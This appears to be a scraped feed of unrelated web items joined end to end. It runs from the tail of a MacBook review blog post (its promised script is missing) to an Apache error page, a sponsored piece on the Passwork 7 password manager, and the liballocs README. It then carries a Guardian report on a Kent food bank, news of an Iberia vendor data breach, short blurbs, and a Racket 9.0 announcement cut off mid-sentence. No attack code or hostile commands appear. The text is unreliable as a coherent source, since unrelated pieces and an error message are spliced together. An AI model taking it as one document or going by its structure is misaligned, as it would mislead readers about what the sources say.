When I got my Mac, I examined the keyboard, and found almost all usual shortcuts - you can change screen brightness on
F1
and
F2
, you can change volume on
F11
and
F12
, and there’s the microphone icon on
F5
.
So I naturally assumed that this was a button to mute the microphone, after all, my old laptop had it too.
I assumed wrong.
There’s
no way
to disable the microphone in macOS via inbuilt means.
The only thing you can do is to manually set the volume input gain level to 0, effectively making the microphone deaf.
Wanna know what the microphone button does then?
I’ll show you:
Yup, it asks you if you want to use the speech-to-text feature.
Cool
, right?
And you can’t change what this button does.
You can set a different shortcut for dictation in the settings, but look what happens when you press the microphone key:
It changes itself back to this button if you click “don’t ask again”!
And then it asks you again once you press it!
So what was the point of providing “don’t ask again” then?
Though I’ve managed to defeat this beast of a problem by writing some AppleScript.
This script can be executed in the Shortcuts app, and by analyzing its output, we can rename the shortcut accordingly:
After adding this shortcut to the “Controls” menu, it acts as a mute button:
Works well so far, and even remembers the current input level value, so I can still adjust it if needed.
Even more, it works better than it did on Linux, because it constantly forgot what level the mic was set to and chose a default value of 20%, which was too low.
Here’s a text version of the script, if anyone needs it:
I can’t share the whole script because no way I’m making an iCloud account for that.
The keyboard layout
Not strictly about the hardware part, since the keyboard itself is pretty good.
It’s a bit of a shame that Apple stopped using their Butterfly switches, as I did like them more than the current scissor ones, but the keyboard is still better than the one on my old laptop.
One thing that bothers me, and which I got very accustomed to, is the fact that GNOME can remember keyboard layout per window.
MacOS can’t do that - and I don’t know what is the reason for that.
The settings page for layouts has a setting called “Automatically switch to a document’s input source”:
However, I’m not sure what it does.
It seems to work sometimes, but other times it does the opposite of what I want to.
I only have two layouts.
Is it that hard to keep track of that amount of data per window?
The keyboard layout (physical)
Though let’s touch the keyboard one more time.
I know that Apple has at least two keyboard layouts for different markets - one for the US and one for Europe.
Figure 10:
US layout
Figure 11:
European layout
I specifically wanted the US layout, because all other laptops and standalone keyboards I had in my entire life had this kind of layout.
Never once in my life have I seen the European layout on any device.
But, for some unknown reason, Apple sells its laptops with a European layout in my area, and when my wife had a Mac, it had that.
Every time I used it, I was fighting my muscle memory.
Sure, it has more keys, and these contain some characters otherwise inaccessible without switching the layout, so it can look like Apple does a good thing.
However, literally no one except Apple users had seen this layout, and it makes no sense to them.
In my particular case, some already existing keys in the European layout are placed differently, like
.
and
?
.
So, since I didn’t want to deal with that, I got myself a version with a US layout.
Thankfully, there’s a “PC” layout in the system settings, so I don’t have to relearn anything.
Using the “PC” layout on a European keyboard, however, is even more cumbersome.
No middle click on the touchpad
For some reason, there’s no such thing as a middle-click on a touchpad.
In Linux, it is usually mapped to clicking with three fingers at the same time.
I’ve been using it in Firefox a lot, and to paste stuff into the terminal once in a while.
However, in macOS, my muscle memory is now against me.
I click with three fingers in Firefox, and usually it brings up the right-click menu, which is fine at least.
But sometimes it is registered as a left-click instead, and it is super annoying.
Re-learning to use @@html:<kbd>⌘ command</kbd> click will take some time, I guess
The camera cutout
Same as with the microphone, I’d like to have a physical way of blocking the camera, but because Apple moved towards a custom-shaped display matrix, it can’t be done as easily as before.
It has a lot of sensors there, and blocking them with a huge plastic cover will make it impossible to close the laptop lid.
Again, not strictly about the hardware side of things, but the display in general feels weird because of this notch - it’s right in the middle of the screen, and I’m used to having the clock there, after years of using GNOME.
Some say it’s more logical to have them at the far right side, as it is commonly done on phones, but phones have a much smaller and narrower screen.
The same goes for notifications - having them in the middle feels more natural to me, because most of the content I’m working with is somewhere in the middle.
But your opinion may vary (as if anything else I said here can be universally agreed on).
The good parts
OK, enough bitching around, let’s discuss some good parts.
The screen itself is gorgeous, colors are vivid yet natural, and the 14-inch model is actually both a bit bigger and a bit taller than my old 13-inch laptop.
I like the screen a lot.
I didn’t go for the nano-texture display, as I don’t work in environments where reflections are problematic, so I can’t say how it affects image quality.
Maybe if I did, it’d be in the bad section.
The speakers are pretty good.
And for a laptop, they’re actually amazing.
They have depth, the upmp, and are loud enough to watch films with comfort - can’t say this about any other laptop I’ve had before.
Touchpad - oh, the touchpad.
Simply put, the fact that it is a lot bigger (in fact, they had even bigger ones before), and I can press on it absolutely everywhere, is amazing.
I was also surprised to learn that they aren’t actually pressed in physically.
Instead, it is a glass surface, which has haptic feedback that simulates the click.
Purely amazing.
I’ve spent a long time trying to find anything remotely close to these touchpads on other laptops, but I never could find one.
M4 Pro CPU is a beast.
Recently, I forgot a passphrase to one of my GPG keys and tried to brute-force it.
My old laptop had AMD Ryzen™ 7 3750H, which isn’t fast by today’s standards, but it wasn’t a slow CPU either - it handled all of my tasks without major hiccups.
I tried it first on the old laptop, and it could try about ~45 passphrases per second.
The M4 could try ~750 passphrases per second.
Everything is
so fast
I can’t believe it.
The macOS itself isn’t all that bad.
As a matter of fact, writing this post helped me find how to fix a lot of problems I initially had - this post was a lot longer before that, but I had to cut stuff from it, as it was no longer applicable.
There are still some oddities - it constantly bothers me with asking permission to run apps for the first time, because I install them through
brew
, or downloaded from the official website (again, I’m not making an Apple account, no, no).
But I finally have a machine on which I can do both my programming tasks and media tasks without needing to keep two different operating systems to handle each task specifically.
Finally, I can record my music with my right hand while writing code with the left - a dream.
Even the liquid glass thing is not as bad as I thought it would be.
Thankfully, Apple added a tinted style to it, so it is less transparent, which helps readability.
And overall, I really like the device - it feels solid, and that it will last me another five years at minimum.
Hopefully I didn’t jinx myself here, though.
Anyhow, thanks for reading, and please do share your experience with me, or if you know ways of solving the problems I’ve listed, I would be glad to know about them!
You don't have permission to access this resource.
Apache Server at wiki.debian.org Port 443
Enterprise password security and secrets management with Passwork 7
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 14:45:54
Passwork 7 unifies enterprise password and secrets management in a self-hosted platform. Organizations can automate credential workflows and test the full system with a free trial and up to 50% Black Friday savings. [...]...
Organizations manage credentials across distributed teams, applications, and infrastructure — passwords, API keys, certificates, and tokens that require different access patterns and security controls. Traditional password managers address individual user needs but weren't designed for operational complexity at scale.
Different roles have different requirements: DevOps teams need programmatic access, security teams demand audit trails, IT admins require granular control. This creates demand for platforms that handle both human and machine credential management within a unified framework.
In its new release, Passwork introduces changes to credential organization, access control, and administrative functionality based on feedback from production environments. The update focuses on usability improvements and security refinements, with attention to workflow efficiency and feature accessibility.
Passwork 7 addresses a concrete operational need: maintaining credential security, enforcing access policies, and enabling team collaboration without disrupting existing workflows. This review examines version 7's practical capabilities and integration characteristics.
What is enterprise password management
Enterprise password management goes beyond storing login credentials. It encompasses the complete lifecycle of sensitive authentication data across an organization: secure generation, encrypted storage, controlled access, automated rotation, and comprehensive auditing.
Unlike consumer password managers, enterprise solutions must support complex organizational structures, integrate with existing infrastructure (LDAP, SSO), provide role-based access control (RBAC), and maintain detailed compliance logs. For organizations managing hundreds of employees and thousands of credentials, these capabilities are essential.
The secrets management challenge
While passwords serve as authentication mechanisms for human users, secrets function as authentication credentials for machine-to-machine communication. API keys, database connection strings, SSH keys, access tokens, and digital certificates enable applications, services, and automated processes to establish secure connections across distributed systems.
The challenge lies in scale and distribution. Modern infrastructure generates secrets at an accelerating rate — embedded in configuration files, injected as environment variables, referenced in deployment manifests, and occasionally exposed in version control systems. Without centralized governance, organizations encounter systemic risks:
Security exposure:
Hardcoded credentials in application code create persistent attack surfaces and expand the blast radius of potential breaches.
Operational chaos:
Scattered secrets across systems make rotation nearly impossible
Compliance gaps:
Absence of centralized audit mechanisms eliminates visibility into access patterns, credential usage, and policy enforcement.
DevOps bottlenecks:
Manual credential distribution slows deployment pipelines.
Effective secrets management addresses these challenges through centralized storage, automated rotation, programmatic access, and complete operational transparency.
Passwork 7: Two products in one unified platform
The platform evolved beyond traditional password storage into a comprehensive secrets management platform. The system now combines two full-fledged products in one unified interface:
Password manager:
An intuitive interface where employees securely store and share credentials for daily work. The streamlined design reduces onboarding time, making it practical for organizations where staff have varying technical expertise.
Secrets management system:
Programmatic access through REST API, Python connector, CLI, and Docker containers enables DevOps teams to automate credential workflows without compromising security.
This dual functionality eliminates the need for separate tools, reducing complexity and licensing costs while improving security posture.
Key features of Passwork for enterprise security
Passwork's feature set solves the practical challenges of enterprise credential security: structuring access across departments, maintaining audit trails for compliance, and automating credential management without rebuilding workflows.
Flexible vault architecture
Like most enterprise password management platforms, Passwork organizes data hierarchically: passwords nested in folders, folders contained within vaults. The structure is familiar, but Passwork's vault layer offers more granular control and flexibility in how access is defined and distributed.
Version 7 introduced a
vault types architecture
that transforms how organizations structure credential access. The system provides three approaches:
User vaults
remain private by default, accessible only to their creator. These function as personal credential stores that users can selectively share with colleagues when collaboration requires it.
Company vaults
automatically include corporate administrators alongside the vault creator. This ensures continuous oversight — administrators cannot be removed or demoted, guaranteeing that leadership maintains visibility into critical credentials.
Custom vault
types represent the most powerful option. Administrators can create unlimited vault types tailored to specific departments, projects, or security requirements. For each custom type, you define designated administrators, configure creator permissions, and establish rules about who can create new vaults.
This flexibility allows organizations to mirror their internal structure within Passwork. An IT director manages IT vaults, the finance director oversees financial credentials, and HR maintains employee access information — all within a single platform with appropriate isolation and oversight.
Meanwhile, a security administrator can be granted access across all vaults for audit and compliance purposes without disrupting departmental autonomy.
Organizations with strict security policies can disable user vault creation entirely, enforcing a model where all credentials reside exclusively in company-controlled or custom vault types.
Granular access control with RBAC and user groups
Access control in
Passwork
operates through a role-based system that scales from small teams to enterprise deployments. Administrators create roles that define specific permissions — what actions users can perform within the system.
The system imposes no artificial limits on role creation, enabling organizations to implement precisely tailored permission structures.
You might grant certain users rights to manage specific roles and groups while restricting access to system configurations. Department heads receive control over their team's credentials without accessing other departments' data.
User groups further streamline permission management. By adding users to a group, they automatically inherit the group's permissions across relevant vaults and folders.
This approach reduces administrative overhead when onboarding new team members or restructuring departments.
Secure credential sharing for internal and external users
Passwork offers multiple methods for credential sharing, each designed for specific use cases:
Internal sharing
enables credential distribution to individuals or groups within your company. Permissions cascade through the vault and folder hierarchy, ensuring users access exactly what they need without exposing unrelated credentials.
External sharing
addresses the common challenge of securely providing credentials to contractors, vendors, or temporary partners. Passwork generates secure, time-limited links that grant access without requiring external users to create accounts or install software.
The platform also offers granular password sharing through its internal password sending system and shortcuts. Access can be revoked at any time, and the system automatically reminds administrators through the security dashboard which users previously had access to each credential.
Every sharing action generates audit logs, providing complete visibility into credential access patterns and supporting compliance requirements.
Complete audit trails and compliance
Every action in Passwork generates activity log entries. Track who accessed which credentials, when, and what actions they performed. Export logs for analysis or integration with SIEM systems.
This operational transparency facilitates regulatory compliance (SOC 2, ISO 27001,
GDPR
) and enables rapid incident response.
When suspicious activity occurs, administrators can quickly identify affected credentials and revoke access.
Enhanced notification system
In addition to audit logs Passwork 7 introduced customizable notifications with flexible delivery options. Users choose notification types and delivery methods — in-app or email — for authentication events and activity log entries.
Each event type can be configured independently. Receive critical security alerts via email immediately. View routine activity updates in-app when convenient. Disable notifications entirely for specific event types.
Integration with corporate identity infrastructure
Enterprise deployments require native integration with existing authentication systems.
Passwork delivers this through comprehensive SSO and LDAP support. Disable an account in Active Directory, and Passwork access revokes immediately.
Automation tools: Python connector, CLI, and Docker
Solution is built on API-first principles, meaning every function available in the user interface is accessible through REST API. This architecture enables complete
programmatic control
over the platform.
The API provides access to all system functions: password management, vault operations, folder structures, user administration, role assignments, tags, file attachments, and comprehensive event logs.
This allows DevOps teams to automate access provisioning, update credentials programmatically, integrate Passwork into deployment pipelines, and export logs for security analysis.
Passwork
provides multiple automation tools designed for different workflows:
Python connector
— The official Python library eliminates complexity by abstracting low-level API calls and cryptographic operations.
Command-line interface
— The CLI enables shell script integration and manual credential management from the terminal. DevOps engineers can incorporate Passwork operations into deployment scripts, automation workflows, and system administration tasks.
Docker container
— Official Docker image simplifies deployment in containerized environments. This approach integrates naturally with Kubernetes, container orchestration platforms, and microservices architectures.
Zero-knowledge architecture
Passwork's Zero knowledge mode encrypts all data client-side before transmission. Even if attackers compromise the server, they cannot decrypt stored credentials.
Each user maintains their own master password, never transmitted to the server. Only the user can decrypt their accessible credentials.
This architecture provides maximum security for organizations handling highly sensitive data.
Self-hosted deployment
Passwork operates as a self-hosted password manager, meaning the entire platform runs on your infrastructure — whether on-premises servers or private cloud environments. No credentials ever touch third-party servers.
This deployment model addresses critical requirements that cloud-based solutions cannot satisfy:
Data sovereignty and compliance:
Organizations subject to GDPR, HIPAA, or sector-specific regulations maintain complete control over credential data location and residency policies.
Network isolation:
Deploy within air-gapped networks or segmented security zones. Critical credentials never traverse public internet connections.
Custom security policies:
Implement your own backup strategies, encryption standards, access controls, and monitoring systems. Define precisely how Passwork integrates with existing security infrastructure.
Zero vendor dependency:
Cloud password managers introduce risks — service outages, policy changes, acquisitions. Self-hosting eliminates this variable entirely.
For enterprises where credential security cannot depend on external providers, self-hosted architecture is foundational.
Why choose Passwork for enterprise environments
Passwork 7 addresses the fundamental challenge facing modern IT organizations: managing both human and machine credentials within a single, secure platform.
Self-hosted deployment keeps sensitive data within your infrastructure, satisfying data residency requirements and regulatory constraints.
Unified platform eliminates the need for separate password and secrets management tools, reducing costs and complexity.
API-first architecture enables comprehensive automation without sacrificing usability for non-technical staff.
Flexible access control supports complex organizational structures through unlimited custom roles and vault types.
Zero-knowledge encryption protects against server compromise, providing maximum security for sensitive credentials.
Complete automation through Python connector, CLI, and Docker integration streamlines DevOps workflows.
For organizations seeking enterprise password management and secrets management within a single solution, Passwork delivers security, flexibility, and automation.
Migrating from other password managers
Passwork supports migration from existing password management solutions, enabling organizations to transition without losing data. The platform provides import tools and documentation for common formats, streamlining the migration process.
Planning your vault structure before migration ensures optimal organization from day one. Consider how your departments, projects, and teams should map to vault types, and establish permission structures that reflect your security policies.
The company provides a 10% discount for organizations migrating from other password managers, making the transition both technically seamless and financially advantageous.
Conclusion
Passwork
delivers a unified approach to password and secrets management that prioritizes practical deployment over theoretical features. The vault architecture, access control model, and interface design accommodate organizations across different scales and operational contexts.
Centralized credential management reduces the need for multiple specialized tools, integrates with existing infrastructure through SSO and LDAP, and supports collaboration workflows without requiring significant process changes.
The platform holds ISO 27001 certification, demonstrating compliance with internationally recognized information security management standards — essential for organizations in regulated sectors or those handling sensitive data under strict governance requirements.
Free trial options and Black Friday offers
A full-featured trial available with no feature limitations. This provides an opportunity to evaluate the platform against your actual infrastructure, security policies, and team workflows before committing.
If the trial meets your requirements, A Black Friday promotion runs from November 26 through December 3, 2025, with discounts reaching 50%. Organizations already planning credential management implementations may find value in testing now and purchasing during this period.
For businesses seeking to consolidate credential management, strengthen security posture, and establish audit-ready access governance, Passwork 7 provides a comprehensive solution designed for rapid deployment with minimal operational disruption.
liballocs is a run-time library and toolchain extension which extends
Unix-like operating systems (currently GNU/Linux) with a rich run-time
reflective model.
If you want to try it, here's how to run a simple demo in a container:
You should see something like the following. This is just a simple demo
of how liballocs knows what is in memory, having precise dynamic type
information and an awareness of allocators. There are four different
allocators visible in this example. (If you're wondering why functions
have size zero, this is correct; see
GitHub issue #82
.)
At 0x55d223c01436 is a static-allocated object of size 0, type __FUN_FROM___ARG0_int$32__ARG1___PTR___PTR_signed_char$8__FUN_TO_int$32
At 0x55d2259235c0 is a __default_lib_malloc-allocated object of size 176, type __ARR0_int$32
At 0x7ffe4e3692c8 is a stackframe-allocated object of size 128, type $2e$2ftest$2ecil$2ecmain_vaddrs_0x1436_0x154d
At 0x7ffe4e369418 is a auxv-allocated object of size 16, type __ARR2___PTR_signed_char$8
More generally, liballocs provides the following.
run-time type information
in a flexible language-agnostic in-memory format
derived from DWARF debugging information
a run-time model of memory as an allocation hierarchy
from memory mappings right down to individual variables, objects and fields
a run-time notion of
allocator
capturing how each piece of memory is allocated and managed
at each level in the hierarchy!
a reflective meta-level API answering queries about arbitrary memory
type, bounds, who allocated it, etc.
each allocator can have its own implementation of this
a uniform base-level API for manipulating memory allocations
at any level in the hierarchy
It does this extension mostly transparently. In particular,
most of the time, you don't have to change your code
... or even recompile it!
so long as you have debugging information
exception: custom allocators (
alloca()
is supported via compile-time instrumentation; obstacks are WIP)
for your own allocators: annotate and relink, but usually no code changes (see Documentation/custom-allocators.md)
most of the time, the slowdown is not noticeable
slowdowns I've seen are mostly under 5%...
... and these could be reduced further, to near zero (see Documentation/projects.md)
some code patterns do suffer worse slowdowns
main one: non-malloc-like custom allocators
most of the time, the memory overheads are low
I don't currently have precise measurements (soon!)
What's the purpose of all this? Unix abstractions are fairly simple and
fairly general, but they are not
humane
, and they invite
fragmentation
. By 'not humane', I mean that they are error-prone and
difficult to experiment with interactively. By 'fragmentation', I mean
they invite building higher-level abstractions in mutually opaque and
incompatible ways (think language VMs, file formats, middlewares...). To
avoid these, liballocs is a minimal extension of Unix-like abstractions
broadly in the spirit of Smalltalk-style dynamism, designed to counter
both of these problems. It provides a foundation for features such as:
run-time type checking in C, C++ and other unsafe languages
type-checked linking, including dynamic linking
rich debugging/tracing tools with data visibility (think: better ltrace/strace)
high-level I/O abstractions over memory-mapped data (think: realloc() part of a file)
multi-language programming without foreign function interfacing APIs
flexible "live" programming
robust and efficient dynamic software update
precise garbage collection across a whole address space
efficient and flexible checkpoint/restore
seamless debugging across native, interpreted and instrumented code
snapshotting and fast startup via allocation-graph dump/reload
easy serialization of arbitrary objects
fine-grained versioning and adaptation of binary interfaces
high-level abstractions for memory-mapped I/O
hosting multiple ABIs in one process, interoperably
reliable inter-process shared-memory data structures
simplifying linking and loading mechanisms
recompilation-based dynamic optimisation of whole processes
robust object-level copy-on-write (+ tools based on it)
robust shadow memory (+ tools based on it)
orthogonal persistence
image-based development (Smalltalk-style or otherwise)
your idea here!
What's novel? Although the run-time facilities of liballocs are (I
contend) richer than what has existed before in any Unix-like system,
you might counter that many of the above goals have apparently been
achieved, at least as far as proof-of-concept, by earlier research or
development prototypes. This has been through heroic efforts of many
people... but evidently these efforts have not "stuck" in the sense of
becoming part of the fabric of a commodity distribution. When this
phenomenon repeats itself, it becomes a research problem to itself --
not simply a matter of tech transfer or follow-through. Many of the
resulting prototypes lack features required for real-world use --
awareness of custom memory allocators is a common lack -- and generally
they are realised in mutually incompatible ways, for want of the right
abstractions.
To borrow Greenspun's tenth rule, this is because each of these earlier
prototypes contains an ad-hoc, bug-ridden and slow implementation of a
small fraction of liballocs. The goal of liballocs is to offer a
flexible, pluralist structure for growing these features on -- in a way
that transparently adds thse capabilities to existing codebases, rather
than requiring up-front "buy-in". It's not a framework; you don't
usually write code against its API, or port your code to it. Instead, it
extends the fabric which already builds and runs your code. The research
programme around liballocs is working towards demonstrating the
practicality of this approach, by building instances of several of the
above systems/services, at modest effort and capable of co-existence.
One idea behind liballocs is to adopt some of the same design heuristics
to which Unix owes its success: minimalism, flexibility and pluralism.
Instead of a defining a single "virtual machine" from the top down, it
permits many possible realisations of the same or similar abstractions.
Unix's free-form byte-oriented facilities allow many higher-level
semantic constructs to coexist (programming languages, structured data,
network protocols and so on). Unlike Unix, liballocs also tries fairly
hard to recognise and reconcile these duplicates after the fact. That
requires a metasystem that is
descriptive
rather than prescriptive. A
few abstractions (allocators, 'types' as data layout descriptions, and
interpreters) allow reconciling commonalities across many distinct
pre-existing concretions: ways in which can be managed, data be
organised, and meanings interpreted. These core abstractions form a
platform for higher-level services that can be made to operate across
multiple ABIs, language runtimes, libraries, coding styles and so on.
There is both a toolchain component and a run-time component. The
run-time is what actually offers the services, and is in this repository.
For this to work reliably, compilation toolchains must be lightly
subverted, but this mostly occurs below the level of user code -- at link
time, by influencing compiler options, and sometimes by light
instrumentation; the basics of this are found in the
toolsub
repository
, which is usable independently of liballocs. Similarly, a
minimal core runtime, which reflects roughly at the ELF level, but does
not know about allocators or types, is in the
librunt
repository
, and liballocs directly extends it.
You can read more about the system in a research paper
http://www.cl.cam.ac.uk/~srk31/#onward15
from Onward! 2015 which
explains how liballocs generalises existing debugging infrastructure, the
contrast with VM-style debug servers, and the Unix-style descriptive
debugging which liballocs adopts and extends. The polyglot aspects of
liballocs were discussed in my talk at Strange Loop 2014
http://www.youtube.com/watch?v=LwicN2u6Dro
. Another paper is rather
overdue, to describe the more mature architecture that now exists.
For full disclosure, here are some additional current limitations that
will eventually go away.
works on GNU/Linux only (some FreeBSD code exists...)
when code does need to be recompiled, the toolchain is a bit slow
it is a little fragile to churn (e.g. glibc or
Linux kernel changes can break it)
reflection is only as good as the available debugging information (or other ground-truth metadata).
So, for example, if you want to find out where all the pointers
are on your stack, you need the compiler's help --
and today's compilers only keep a very partial record of this.
Similarly, if you want to reflect on C preprocessor macros,
you'll need some source of that metadata, which standard debuginfo
builds usually omit.
To build this software on a Debian-based GNU/Linux distribution,
please see the .circleci/ and buildtest/ directories. The former
shows the actively tested build recipe, and the latter has a number
of Dockerfiles for doing testable, (mostly) reproducible builds from
a bare-bones start on the given distributions. You should be able to
adapt the RUN commands fairly easily to do your build. If you find
any problems doing these builds ("docker build buildtest/xxx") please
report them. If there is no buildtest Dockerfile for your
distribution, pick the "closest" one but then you'll need to figure
out any necessary changes for yourself. Ideally, please contribute a
Dockerfile once you've done this. Thanks to Manuel Rigger for
contributing the initial Ubuntu 18.04 one.
Note also there are submodules at many levels in this git repo,
including nested submodules. You pull naturally end up pulling them
all if you follow one of the buildtest recipes or the instructions
below. The following diagram shows the structure (
generated by this
script
; view the SVG proper for useful mouseover labels explaining
what each subrepo contains).
Generic download-and-build instructions for Debian platforms
look something like the following.
... where you should tune "-j4" according to your needs. After building,
you will also want to set up space to hold metadata files, and build the
metadata for your C library binary. (This is slow because libdwarf calls
malloc()
far, far too often.)
$ cd ..
$ export LIBALLOCS=`pwd`/liballocs
$ sudo mkdir /usr/lib/meta # metadata will live here
$ sudo chown root:staff /usr/lib/meta
$ sudo chmod g+w /usr/lib/meta
$ make -f "$LIBALLOCS"/tools/Makefile.meta \
/usr/lib/meta$( readlink -f /lib/x86_64-linux-gnu/libc.so.6 )-meta.so
If you've got this far, you may as well run the tests.
$ cd liballocs/tests
$ make -k # please report failures
“I’ve sat and cried many times, feeling like I’ve let my kids down,” is the heartbreaking description one Kent mother gives of the difficulty she has meeting her family’s needs.
With four children still under 13, the family live in a rented flat in the town of Herne Bay on the county’s north coast. She does not come to the door, but her partner passes a handwritten note relaying their meagre existence on benefits as the Guardian joins the local food bank’s morning delivery round.
“I have to be careful with electric and gas, and food has to be £1 frozen food,” she writes. “Snacks are a very rare treat. If it wasn’t for the
Canterbury food bank
we would have nothing but pasta.
“At Christmas my children will have small stuff and that will mean less money on food, more stress and worry.”
The charity is in the frontline of an ongoing cost of living crisis that Rachel Reeves has promised to tackle in her budget next week
with measures to slow price rises
.
In 2019, the food bank, based on an industrial unit in nearby Whitstable, was giving out 450 parcels a month. Now, a typical month involves well over 1,100 parcels, sometimes in excess of 1,400. The quantity of food going out of the door puts the charity, which covers Canterbury, Whitstable and Herne Bay, in the top 5% of food banks in the country.
When these kinds of services were first established in the UK after the 2008-09 financial crisis, most people thought they would outlive their value in two or three years. But on what is the Guardian’s third visit to the food bank in four years this one shows no sign of reaching its use-by date.
In
February 2022
, the charity had gone from spending virtually nothing on food (as donations matched demand) to about £3,000 a month as the Covid crisis segued into a
cost of living crisis
. When we returned the following year, its monthly food bill was £7,000. Today it is £10,000.
It receives generous support locally, with food donations rising and coming in at between 1,100 and 1,400kg a month. But demand is up 15% year on year, with the charity using cash donations and grant money to cover its bills. Meanwhile, rising food prices means every
pound buys less than it used to.
This week’s figures from the Office for National Statistics showed UK inflation
eased back to 3.6%
in October. However, a deeper dive highlights the pressure on families, as rising prices for bread, cereals, meat and vegetables drove up the annual rate of food and drink price rises to 4.9%, from 4.5% the previous month.
Since 2019, Whitstable food bank has increased its food parcels from 450 a month to more than 1,100.
Photograph: Teri Pengilley/The Guardian
“Every pound we spend buys around 10% less food than it did a year and a half ago,” says Stuart Jaenicke, the charity’s head of finance.
The cost of its shopping basket has risen by about 11% in that time, he says, pointing to sharp increases on items such as teabags, hot chocolate and coffee.
An end to the policy – which means parents can claim universal credit or tax credits only for their first two children – would mean “my children would be able to have more of the things they need”, continues the Herne Bay mother.
Her partner’s mental illnesses prevent him working and she is also unable to work because the special educational needs of two of the children mean “constant calls to go to school”.
The chief executive of Child Poverty Action Group, Alison Garnham, says getting rid of
the cap
is the “right thing to do”. A reversal would instantly lift 350,000 children out of poverty and lessen the hardship experienced by another 700,000, she says, adding: “Removing this invidious policy would mean millions more children get the fair start in life they deserve.”
It is on the “financial side” that the food bank is feeling the greatest pressure as even its regular donors feel more hard-up.
“Even when headline inflation falls, supermarket prices don’t go back down – they stay high,” says Jaenicke. “We’re paying the same as everyone else.
Food banks have become ‘a necessary part of the welfare state’, says one social policy researcher.
Photograph: Teri Pengilley/The Guardian
“Monetary donations from the public have fallen sharply – down more than £80,000 over the past two years if current trends continue – and grants have become much more competitive and much less predictable,” he adds.
This year the charity has received about 60% of the income it expected but is fortunate in that it could keep going for a year on its financial reserves.
“So we’re in a position where demand is up, food prices are up, donations are down, and funding is volatile,” he says. “And behind those numbers are real households: more working families, more single parents, more older people, and more people asking for no-cook items because they can’t afford energy.
“This isn’t an emergency spike any more. It’s become the new normal.”
According to the
2025 indices of deprivation
Canterbury is an average place, finishing mid-table in the list of 296 local authority districts, according to Peter Taylor-Gooby
,
research professor of social policy at the University of Kent, who is one of the charity’s trustees.
The problems locals face are not uncommon in seaside towns, he says. “It’s got a lot of tourism, a bit of retail and the kinds of jobs you get are insecure and low-paid.”
With three universities in nearby Canterbury there is also a large, cheap labour pool that depresses wages, although increasingly students too are turning to the food bank for help.
“In the Canterbury area, poverty is becoming deeper and more concentrated, as it is in the country as a whole,” says Taylor-Gooby, who says it is because benefits and wages have not kept pace with rising living costs.
With seemingly no light at the end of the tunnel, the populism of
Reform UK
has resonated with voters. It took control of Kent county council in May, although
a recording
of a recent internal meeting published by the Guardian revealed bitter divisions as it strained against the financial realities of the job.
A volunteer at Whitstable food bank.
Photograph: Teri Pengilley/The Guardian
“There’s a byelection for the local council in my ward and talking to people you get a sense that ‘nobody has never done anything for us’,” says Taylor-Gooby.
On the second floor of the small business unit there is a bank of desks where the staff calmly deal with requests for help from sometimes overwrought
callers.
The most common issue is the cost of living, says Maria. “Prices for food, fuel, and rent keep rising, but wages and benefits just aren’t keeping up. Many people have unpredictable hours or zero-hours contracts, so one quiet week at work can mean an empty fridge.”
Her colleague Julia chips in that “any buffer or rainy-day fund is long gone”, so unexpected expenses like children’s clothes or a parking fine can leave people in dire straits.
At a time when many Britons are contemplating buying Advent calendars filled with everything from marshmallows to gin miniatures, on the wall a poster advertises a “reverse Advent calendar”. The campaign suggests adding an item a day – from baked beans to mince pies and shampoo – to a bag for life, then donating it.
Liam Waghorn, the operations manager, explains that it has to “work harder” for donations as there is more competition. “We have to go and find donations rather than expect them.” Technology helps. One new aid is the
BanktheFood
app, which sends supporters alerts about products in short supply.
On each Guardian visit, the food bank – originally a community project run by local churches – is slicker and more businesslike. Screens have replaced pens and papers at picking stations, thanks to the IT wizardry of one of the retired volunteers, giving real-time information as parcel requests are logged.
Waghorn proudly relays that it has been able to add fresh food, such as bread and eggs, to its parcels to make them more nutritious. It has also sped up the service to next-day delivery.
With poverty more widespread, food banks have necessarily become larger and more professional, says Taylor-Gooby. “Once the goal of food banks was to work themselves out of a job. Now they have become a necessary part of the welfare state.”
Iberia discloses customer data leak after vendor security breach
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 13:46:25
Spanish flag carrier Iberia has begun notifying customers of a data security incident stemming from a compromise at one of its suppliers. The disclosure comes days after a threat actor claimed on hacker forums to have access to 77 GB of data allegedly stolen from the airline. [...]...
Spanish flag carrier Iberia has begun notifying customers of a data security incident stemming from a compromise at one of its suppliers.
The disclosure comes days after a threat actor claimed on hacker forums to have access to 77 GB of data allegedly stolen from the airline.
Customer data affected
Iberia, Spain's largest airline and part of IAG (International Airlines Group), says unauthorized access to a supplier's systems resulted in the exposure of certain customer information.
According to an
email seen by
threat intelligence platform Hackmanac, the compromised data may include:
Customer's name and surname
Email address
Loyalty card (Iberia Club) identification number
The airline says customers' Iberia account login credentials and passwords were not compromised, nor was any banking or payment card information accessed.
Iberia notice of security incident emailed to customers
(Hackmanac on X)
"As soon as we became aware of the incident, we activated our security protocol and procedures and implemented all necessary technical and organizational measures to contain it, mitigate its effects, and prevent its recurrence," states the security notice mailed out in Spanish.
Iberia says it has added additional protections around the email address linked to customer accounts, now requiring a verification code before any changes can be made.
The airline is also monitoring its systems for suspicious activity. Relevant authorities have been notified, and the investigation remains ongoing in coordination with the involved supplier.
"As of the date of this communication, we have no evidence of any fraudulent use of this data. In any case, we recommend that you pay attention to any suspicious communications you may receive to avoid any potential problems they may cause. We encourage you to report any anomalous or suspicious activity you detect to our call center by calling the following telephone number: +34 900111500," continues the email.
Disclosure follows data theft claims
The timing of the disclosure is noteworthy, as it follows a claim made roughly a week ago by a threat actor online that they had access to 77 GB of purported Iberia data and were attempting to sell it for $150,000.
In the
forum post
(shown below), the threat actor claimed the trove was "extracted directly from [the airline's] internal servers" and contained A320/A321 technical data, AMP maintenance files, engine information, and other internal documents:
Threat actor claiming to sell purported Iberia data last week (
Hackmanac on X)
It's not clear whether the purported data dump is related to Iberia's incident, as the listing does not mention the customer information Iberia says was exposed. Furthermore, the airline attributes the breach to a third-party vendor rather than its own servers.
BleepingComputer has not verified the authenticity of the data advertised online. We have approached Iberia's press team with further questions and will update this article once we hear back.
In the meantime, Iberia customers and partners should remain cautious of any unsolicited or suspicious messages claiming to come from the airline, as these may be phishing or social engineering attempts.
As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.
This free cheat sheet outlines 7 best practices you can start using today.
Tosijs-schema is a super lightweight schema-first LLM-native JSON schema library
A major release is always exciting and Racket 9.0 is no exception in that it introduces Parallel Threads. While Racket has had green threads for some time, and supports parallelism via futures and places, we feel parallel threads is a major addition.
Parallel threads can be created using the
#:pool
